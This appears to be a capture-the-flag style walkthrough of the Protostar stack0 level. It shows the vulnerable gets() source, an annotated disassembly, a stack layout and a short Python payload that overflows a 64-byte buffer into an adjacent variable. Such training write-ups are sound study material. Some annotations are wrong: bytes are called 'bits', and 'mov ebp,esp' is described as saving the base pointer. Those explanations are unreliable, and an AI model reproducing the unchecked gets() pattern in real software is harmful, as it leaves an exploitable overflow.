
Binary Exploitation Protostar Stack0 - Walkthrough

Hello Guyz,




In this post, I am going to show you how we can beat the Protostar stack0 level. Our main goal here is to understand how the program actually works at the machine level, so that every concept becomes very clear.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar wargame; I am just a player.
  • Here I am only providing hints and references, so if you feel stuck anywhere, take a look here.
  • For practical hints, check the YouTube video given below.


Source Code :



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}


Disassembly Of Main Function (Using GDB)


########################################################################################################
                [ The system has created space of 0x60 (hex), 96 (decimal), bits on the stack ]
########################################################################################################

[-------------------------------------code-------------------------------------]
   0x80483f5 <main+1>: mov    ebp,esp                          <<=== Save base pointer onto the stack
   0x80483f7 <main+3>: and    esp,0xfffffff0
   0x80483fa <main+6>: sub    esp,0x60                         <<=== Creates space of 96 bits on the stack
=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== Stores 0 into bits 92-96 (modified = 0)
   0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== Copies the address at offset 28 of the 96-bit
                                                                      region into EAX; from there it is moved onto
                                                                      the stack as the argument for gets
   0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Copy EAX onto the stack (argument for gets)
   0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Call gets
   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Load the value of bits 92-96 (modified) into EAX


Situation On Stack



0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Buffer(64)                                           | modified | 
 ============================================================================================
                         ^                                                            ^
                         |                                                            |
                       Get Overwrites from here                                       +
                                                                                  Target Area


Exploit


#!/usr/bin/python

# Total frame size reserved on the stack: 0x60 (96 in decimal)
#   0x80483fa <main+6>:  sub    esp,0x60                  ==> 96 in decimal
#   0x8048405 <main+17>: lea    eax,[esp+0x1c]            ==> buffer starts at esp+0x1c (28)
#   0x80483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0  ==> modified lives at esp+0x5c (92)
#   0x804840c <main+24>: call   0x804830c <gets@plt>
# Distance from the start of buffer to modified: 0x5c - 0x1c = 0x40 = 64

payload = 'a' * 64           # fills buffer[64]
payload += 'b' * 4           # lands on the modified variable
# Usage: python exploit.py > tmp; ./bin/stack0 < tmp
print(payload)



For a more detailed walkthrough, check the YouTube video playlist provided below.


